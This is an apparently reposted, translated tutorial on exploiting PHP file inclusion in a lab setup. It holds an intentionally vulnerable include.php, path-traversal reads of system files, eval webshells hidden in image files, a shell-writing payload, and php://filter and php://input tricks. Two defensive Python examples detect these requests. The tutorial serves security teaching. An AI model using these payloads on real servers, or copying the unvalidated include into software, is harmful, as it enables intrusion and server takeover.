
[File inclusion vulnerability-03] Six ways to exploit file inclusion vulnerabilities

2022-06-25 10:52:00 Like the wind 9

1 Introduction to exploiting file inclusion vulnerabilities

The first two parts covered what file inclusion is and the harm its vulnerabilities cause. This part deals mainly with how file inclusion vulnerabilities are exploited.
Exploitation methods: this part shares the following six ways of exploiting a file inclusion vulnerability.

  • Reading the contents of sensitive files;
  • Including an image file directly to get a shell (GetShell);
  • Including a file that writes a shell, then getting a shell through the written file;
  • Using a PHP stream wrapper (pseudo-protocol) to read the contents of sensitive files;
  • Using a PHP stream wrapper to transmit (read) PHP source code;
  • Using a PHP stream wrapper to execute PHP statements.

2 Experimental environment and preparation

(1) Target machine (the server): this experiment is tested in a WAMP environment. For the deployment process see the article "[Language environment] WAMP environment deployment and optimization, using win2008R2SP1 as the operating system". The IP address is 172.16.1.1.

  • Under the root directory of the environment's website, create a new folder FileInclusion; the files for the experiment are created in this folder.
  • Create a new txt file, enter the following code, and rename the file to include.php.
<?php
// The path parameter is taken from the query string without any validation ...
$path = $_GET['path'];
echo "<h1>This is include.php!</h1>";
// ... and included as-is: this unvalidated include is the vulnerability the experiments exploit.
include $path;
?>

(2) Test machine: the physical host.
(3) The server and the physical host are both connected to VMnet1.
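The include.php above includes whatever the path parameter names. As an added example for the defender's side (it is not code from the original article), the following Python function models the checks a hardened version of that script would perform before calling include, and runs the path values used later in this article through them. The include root /srv/app/FileInclusion, the extension allowlist and the sample request paths are assumptions made for this example; the same logic is what one would write in the PHP handler with realpath() and an extension allowlist.

```python
import os
from typing import Dict, List, Optional

# Constructed for this example: the only directory the application may include from.
INCLUDE_ROOT = "/srv/app/FileInclusion"
# Constructed for this example: the only file type the application legitimately includes.
ALLOWED_EXTENSIONS = (".php",)


def resolve_include(requested: str, include_root: str = INCLUDE_ROOT) -> Optional[str]:
    """Return the canonical path that may be included, or None if the request is refused.

    These are the checks the include.php above skips before `include $path`:
    no stream wrapper or drive letter, the canonical path stays inside the
    include root, and only an allowlisted file type is included.
    """
    if not requested:
        return None
    # PHP on Windows accepts both separators; normalize so every check sees one form.
    candidate = requested.replace("\\", "/")
    # A colon means a stream wrapper (php://, file://, http://) or a drive letter (c:).
    # A legitimate include name is relative to the include root and has neither.
    if ":" in candidate:
        return None
    root = os.path.realpath(include_root)
    # realpath() collapses every "..", so traversal shows up as a path outside root.
    target = os.path.realpath(os.path.join(root, candidate))
    if os.path.commonpath([root, target]) != root:
        return None
    # An image or text file is never a legitimate include target, whatever it contains.
    if not target.lower().endswith(ALLOWED_EXTENSIONS):
        return None
    return target


def classify(requests: List[str]) -> Dict[str, Optional[str]]:
    """Map each requested path to its resolved include path, or None when refused."""
    return {r: resolve_include(r) for r in requests}


if __name__ == "__main__":
    # Constructed sample: the path values the article's six methods send, plus one
    # legitimate page name that a hardened script must still accept.
    samples = [
        "help.php",
        r"c:\windows\System32\drivers\etc\hosts",
        r"..\..\..\..\..\..\..\..\windows\System32\drivers\etc\hosts",
        "muma.jpg",
        "muma2.jpg",
        r"file://c:\windows\System32\drivers\etc\hosts",
        "php://filter/read=convert.base64-encode/resource=shell.php",
        "php://input",
    ]
    for requested, resolved in classify(samples).items():
        print(f"{'ALLOW' if resolved else 'REFUSE':<7} {requested!r} -> {resolved}")
```

Only help.php is accepted; every other value from the six methods is refused by one of the three checks. A fixed map from page names to files is stronger still, because then no user-supplied string ever reaches include at all.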

3 Method 1: Reading sensitive files

3.1 Introduction to the experiment

Purpose: understand how a file inclusion vulnerability is used to obtain sensitive local files from the server.

The file inclusion vulnerability can be used to read arbitrary files. Reading a file requires:

  • the target file to exist on the target host (its path may be given as an absolute or a relative path);
  • the web server to have read permission for the file.

3.2 The experimental steps

Take the server's local hosts file as an example. On Windows the hosts file path is c:\windows\System32\drivers\etc\hosts. The steps are as follows:

(1) In the physical host's browser, visit http://172.16.1.1/FileInclusion/include.php?path=c:\windows\System32\drivers\etc\hosts. The page shows that the contents of the server's local hosts file are displayed successfully.
(2) The above uses an absolute path. With a relative path, several ..\ segments can be prepended to climb from the parent directory up to the root, for example http://172.16.1.1/FileInclusion/include.php?path=..\..\..\..\..\..\..\..\windows\System32\drivers\etc\hosts; the page again shows the hosts file. On Windows this method only works when the server is deployed on the C: drive; if it is on another drive, the file cannot be read this way. On Linux everything is under the same root directory, so this problem does not arise.

4 Method 2: Including an image file directly to get a shell (GetShell)

4.1 Introduction to the experiment

Purpose: exploit the server's file inclusion vulnerability to get a shell using AntSword (中国蚁剑) and an image webshell (containing a one-line PHP shell).

Experiment preparation
(1) Image webshell. Under the FileInclusion folder in the target machine's web root, create a new txt file, enter <?php @eval($_REQUEST['cmd']);?>, and name it muma.jpg. Assume the attacker placed this file there through a file upload vulnerability or some other vulnerability; see "[File upload vulnerability-04] Server-side detection and bypass examples (MIME type, file extension, file contents)".

(2) Physical host: install AntSword; see the article "[AntSword tool-01] Installation process and application examples of the AntSword website management tool".

4.2 The experimental steps

(1) In the physical host's browser, visit http://172.16.1.1/FileInclusion/include.php?path=muma.jpg&cmd=print(123456); (note the semicolon at the end). The response shows that the file is included and the code after the equals sign is executed.

(2) Connect with AntSword. Because the PHP code sits in a .jpg file, it would not run without some other parsing vulnerability; in the previous step, however, http://172.16.1.1/FileInclusion/include.php?path=muma.jpg executed the PHP statement in the image webshell, so AntSword can connect through that URL. Open AntSword, add a connection, fill in the following information and click Add.
(3) Manage the server. After adding, the new entry appears in the main window of the tool; double-click it to manage the server.

5 Method 3: Including a webshell that writes a shell file

5.1 Introduction to the experiment

Purpose: exploit the file inclusion vulnerability to execute an image webshell that generates a shell file. Other code can be generated the same way.

Experiment preparation
(1) Image webshell. Under the FileInclusion folder in the target machine's web root, create a new txt file and enter <?php fputs(fopen('shell.php','w'),"<?php @eval(\$_REQUEST['cmd'])?>");?> (this code creates a file named shell.php in the current directory whose content is <?php @eval(\$_REQUEST['cmd'])?>). Name the file muma2.jpg. Assume the attacker placed this file there through a file upload vulnerability or some other vulnerability; see "[File upload vulnerability-04] Server-side detection and bypass examples (MIME type, file extension, file contents)".

(2) Physical host: install AntSword; see the article "[AntSword tool-01] Installation process and application examples of the AntSword website management tool".

5.2 The experimental steps

(1) In the physical host's browser, visit http://172.16.1.1/FileInclusion/include.php?path=muma2.jpg. The page is displayed without any error.

(2) Verify that the code just executed. Open the folder on the target machine: shell.php has been generated.
(3) Open AntSword and connect to shell.php: right-click, Add data, and fill in the connection details. Since this webshell sits in a PHP file, it can be accessed directly without going through the file inclusion vulnerability. The new connection is shown below.

(4) Double-click the new connection; the server can be managed successfully.

6 Method 4: Using a PHP stream wrapper to read a local file

PHP's file:// wrapper can be used to access files on the local system.

6.1 Introduction to the experiment

Purpose: the purpose is the same as that of Method 1; it is covered here because the method exists.

Condition: the allow_url_include setting in the PHP configuration file must be On.

6.2 The experimental steps

In the physical host's browser, enter http://172.16.1.1/FileInclusion/include.php?path=file://c:\windows\System32\drivers\etc\hosts. The contents of the file are read successfully.

Note: this method is much like reading the local file directly; why one would choose it over the direct way is something only real engagements show.

7 Method 5: Using a PHP stream wrapper to transmit a PHP file

7.1 Introduction to the experiment

Purpose: read the website's source code. When a file is read with Method 1 or Method 4, any PHP code in it is executed unconditionally, so what is displayed is the result of executing the code. To see the PHP source itself, this method is needed.

Condition: the allow_url_include setting in the PHP configuration file must be On.

7.2 The experimental steps

(1) In the physical host's browser, enter http://172.16.1.1/FileInclusion/include.php?path=php://filter/read=convert.base64-encode/resource=shell.php. The page displays the encoded text. This reads the file through the PHP php://filter pseudo-protocol: filter denotes a stream filter, read means the file contents are read, the read filter is convert.base64-encode (the file is read and base64-encoded), and resource is followed by the name of the file.
(2) Copy the displayed text and paste it into an online encoding/decoding tool to view the source code.

8 Method 6: Using a PHP stream wrapper to execute PHP code (failed; to be retried later)

8.1 Introduction to the experiment

Purpose: execute PHP code directly, without a file existing locally or remotely.
Condition: the allow_url_include setting in the PHP configuration file must be On.

8.2 The experimental steps

(1) On the physical host, open Burp Suite and switch to the Repeater module. Copy the URL from the previous experiment, right-click and choose Paste URL as request to add the request from the URL. Click Send; the response content matches the previous experiment. This experiment uses Burp Suite to execute PHP code through this request.
(2) Change the path parameter to php://input and put the PHP code to run, <?php phpinfo();?>, in the request body, then click Send. The response shows the result of executing the probe statement.

9 Summary

(1) Summary of the ways an image webshell can be made to execute:

  • Exploit a middleware parsing vulnerability; the approach often differs between middleware versions. See the following article:
    "[File upload vulnerability-07] Overview and examples of middleware file parsing vulnerabilities: Apache, IIS and Nginx";
  • Use .htaccess to modify the local Apache configuration. See ".htaccess attack experiments";
  • Exploit a file inclusion vulnerability to execute it. See this article.

(2) Master the six ways of exploiting file inclusion vulnerabilities.
(3) The precondition for using PHP stream wrappers is that remote file inclusion is enabled (the allow_url_include setting in the PHP configuration file is On), but this setting is generally off by default. So what are PHP stream wrappers useful for? Mainly for CTF challenges, and as a backdoor for persistent control.
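As an added example for the defender's side (not code from the original article), the following Python scans web-server access-log lines for the request patterns the six methods above leave behind: ../ or ..\ traversal segments, stream-wrapper schemes such as php:// and file://, absolute paths, and non-PHP file names passed to a parameter that the application hands to include. The log lines are constructed to reproduce this article's requests, and the parameter name set INCLUDE_PARAMS is an assumption made for this example.

```python
import re
from collections import defaultdict
from typing import Dict, List, NamedTuple, Set
from urllib.parse import parse_qs, urlsplit

# Constructed for this example: query parameters the application hands to include().
INCLUDE_PARAMS = {"path"}

# Constructed sample access-log lines (combined log format) reproducing the requests sent
# in the six methods above plus two benign requests; not traffic captured from a real server.
SAMPLE_LOG = r"""
172.16.1.10 - - [25/Jun/2022:10:52:01 +0800] "GET /FileInclusion/include.php?path=help.php HTTP/1.1" 200 512
172.16.1.10 - - [25/Jun/2022:10:52:05 +0800] "GET /FileInclusion/include.php?path=c:\windows\System32\drivers\etc\hosts HTTP/1.1" 200 824
172.16.1.10 - - [25/Jun/2022:10:52:09 +0800] "GET /FileInclusion/include.php?path=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cwindows%5CSystem32%5Cdrivers%5Cetc%5Chosts HTTP/1.1" 200 824
172.16.1.10 - - [25/Jun/2022:10:52:14 +0800] "GET /FileInclusion/include.php?path=muma.jpg&cmd=print(123456); HTTP/1.1" 200 60
172.16.1.10 - - [25/Jun/2022:10:52:20 +0800] "GET /FileInclusion/include.php?path=muma2.jpg HTTP/1.1" 200 40
172.16.1.10 - - [25/Jun/2022:10:52:26 +0800] "GET /FileInclusion/include.php?path=file://c:\windows\System32\drivers\etc\hosts HTTP/1.1" 200 824
172.16.1.10 - - [25/Jun/2022:10:52:33 +0800] "GET /FileInclusion/include.php?path=php://filter/read=convert.base64-encode/resource=shell.php HTTP/1.1" 200 96
172.16.1.10 - - [25/Jun/2022:10:52:40 +0800] "POST /FileInclusion/include.php?path=php://input HTTP/1.1" 200 30210
172.16.1.11 - - [25/Jun/2022:10:53:02 +0800] "GET /index.php HTTP/1.1" 200 1200
""".strip("\n")

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")   # ../ or ..\ path segment
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)  # php://, file://, http://, ...
ABS_PATH_RE = re.compile(r"^([a-z]:[\\/]|/)", re.I)     # c:\... or /...


class Finding(NamedTuple):
    line_no: int
    client: str
    method: str
    param: str
    value: str
    rule: str


def check_value(param: str, value: str) -> List[str]:
    """Return the names of the detection rules one decoded parameter value trips."""
    rules = []
    if SCHEME_RE.match(value):
        rules.append("stream-wrapper")
    if TRAVERSAL_RE.search(value):
        rules.append("traversal")
    if ABS_PATH_RE.match(value):
        rules.append("absolute-path")
    # An include parameter naming anything but a .php file (muma.jpg, hosts) is suspect.
    if param in INCLUDE_PARAMS and not value.lower().endswith(".php"):
        rules.append("non-php-include")
    return rules


def scan_log(text: str) -> List[Finding]:
    """Parse each request line, decode its query string and run the rules on every value."""
    findings: List[Finding] = []
    for line_no, line in enumerate(text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        client = line.split(" ", 1)[0]
        query = urlsplit(match.group("target")).query
        # parse_qs percent-decodes values, so %5C.. in the log is compared as ..\ here.
        for param, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:
                for rule in check_value(param, value):
                    findings.append(Finding(line_no, client, match.group("method"), param, value, rule))
    return findings


def summarize(findings: List[Finding]) -> Dict[int, Set[str]]:
    """Group the rules tripped per log line; lines with no findings are absent."""
    by_line: Dict[int, Set[str]] = defaultdict(set)
    for f in findings:
        by_line[f.line_no].add(f.rule)
    return dict(by_line)


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.client} {f.method} {f.param}={f.value!r} -> {f.rule}")
```

The benign help.php and index.php requests produce no findings; the php://filter request is caught only by the stream-wrapper rule, since its resource name ends in .php, which is why the rules are applied together rather than relying on the extension alone.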

References

php://: introduction to the various pseudo-protocols.

Original site

Copyright notice
This article was written by [Like the wind 9]. When reposting, please include the link to the original. Thank you.
https://yzsam.com/2022/176/202206251023127271.html